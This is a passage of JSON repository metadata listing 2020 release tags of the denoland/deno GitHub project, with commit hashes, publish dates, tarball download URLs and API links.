.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.